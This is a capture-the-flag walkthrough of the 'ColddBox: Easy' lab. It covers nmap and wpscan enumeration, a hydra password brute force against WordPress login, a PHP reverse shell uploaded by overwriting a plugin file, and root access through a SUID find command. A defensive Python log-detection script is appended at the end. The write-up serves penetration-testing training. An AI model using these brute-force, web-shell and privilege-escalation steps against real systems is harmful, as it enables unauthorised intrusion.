ColddBox: Easy


Last updated 3 years ago

Was this helpful?

Reconnaissance

Initial nmap scan to find open ports, using the "treat all hosts as alive" flag (-Pn):

nmap -Pn 10.10.70.76

Detailed nmap scan:

Command Breakdown:

  • (-sV): Service version detection

  • (-sC): Default nmap scripts

  • (-p 80): Scan only port 80

  • (-oN nmap): Save the output to a file called nmap

nmap -sV -sC -p 80 -oN nmap 10.10.70.76

Enumeration

Let's visit the site.

It looks like a well-made page; while looking through the website I found a login page.

From the nmap scan we also know that WordPress 4.1.31 is running. There is a WordPress scanner called wpscan; let's use it to find more information.

wpscan --url http://10.10.70.76/ -e vp,t,u

Looking at the output, we find some interesting information, including the usernames.

Let's use hydra to brute-force and find at least one password for one of the users. I saved the usernames in a file called users.

Exploitation

Let's now use hydra to crack the password:

hydra -L users -P /usr/share/wordlists/rockyou.txt 10.10.70.76 http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'

And we get the password; let's log in.

We are logged in. To get a reverse shell on the machine we have to upload a PHP reverse shell, which you can find here. First go to the Plugins tab and replace one of the plugins with the PHP reverse shell, making sure to change the IP to yours.

After replacing it, click Update File and start a netcat listener.

Then navigate to the page:

http://10.10.58.100/wp-content/plugins/akismet/akismet.php

You should get a reverse shell. Let's stabilize the shell.

Privilege Escalation

Let's look for SUID binaries that we can exploit.

find / -perm -u=s -type f 2>/dev/null

/usr/bin/find is SUID, so let's go to GTFOBins and look up the command to escalate privileges.

Let's use the second command:

find . -exec /bin/sh -p \; -quit

We are now root.
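As an added defender-side example (not part of the original writeup), here is a Python check that runs over constructed web-server log lines and flags the two server-visible signals of the exploitation steps above: a burst of POSTs to /wp-login.php from one source followed by a 302 (the same redirect that hydra's S=Location condition keys on), and a direct request to a .php file under /wp-content/plugins/. The combined log layout, the sample lines and the threshold are assumptions.

```python
import re
from collections import defaultdict

# Combined log format as Apache/nginx emit it by default (assumed layout).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
# Direct request to a PHP file inside the plugins directory.
PLUGIN_PHP_RE = re.compile(r"^/wp-content/plugins/[^?]+\.php(?:\?|$)")

# Constructed sample: a burst of failed logins, one success, an ordinary visitor,
# then a direct hit on a plugin file from the same source.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "POST /wp-login.php HTTP/1.1" 200 3421
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "POST /wp-login.php HTTP/1.1" 200 3421
10.0.0.5 - - [10/Oct/2023:13:55:37 +0000] "POST /wp-login.php HTTP/1.1" 200 3421
10.0.0.5 - - [10/Oct/2023:13:55:37 +0000] "POST /wp-login.php HTTP/1.1" 200 3421
10.0.0.5 - - [10/Oct/2023:13:55:38 +0000] "POST /wp-login.php HTTP/1.1" 302 0
10.0.0.9 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php HTTP/1.1" 200 8812
10.0.0.5 - - [10/Oct/2023:13:58:12 +0000] "GET /wp-content/plugins/akismet/akismet.php HTTP/1.1" 200 0
"""

def analyze(log_text, failed_threshold=4):
    """Summarise per-source-IP signals of the login brute force and plugin abuse.

    WordPress answers a failed login with 200 (form re-rendered) and a
    successful one with a 302 redirect, so many 200s then a 302 from one
    source is the brute-force-then-success signature.
    """
    failed, success, plugin_hits = defaultdict(int), defaultdict(int), defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not parse rather than guess
        ip, method, path, status = m["ip"], m["method"], m["path"], m["status"]
        if method == "POST" and path.split("?", 1)[0] == "/wp-login.php":
            if status == "302":
                success[ip] += 1
            else:
                failed[ip] += 1
        elif PLUGIN_PHP_RE.match(path):
            plugin_hits[ip].append(path)
    brute = {ip for ip, n in failed.items() if n >= failed_threshold}
    return {
        "bruteforce_sources": sorted(brute),
        # brute force followed by a redirect: credential guessing likely worked
        "likely_account_takeover": sorted(ip for ip in brute if success[ip]),
        "direct_plugin_file_requests": dict(plugin_hits),
    }

if __name__ == "__main__":
    for key, value in analyze(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```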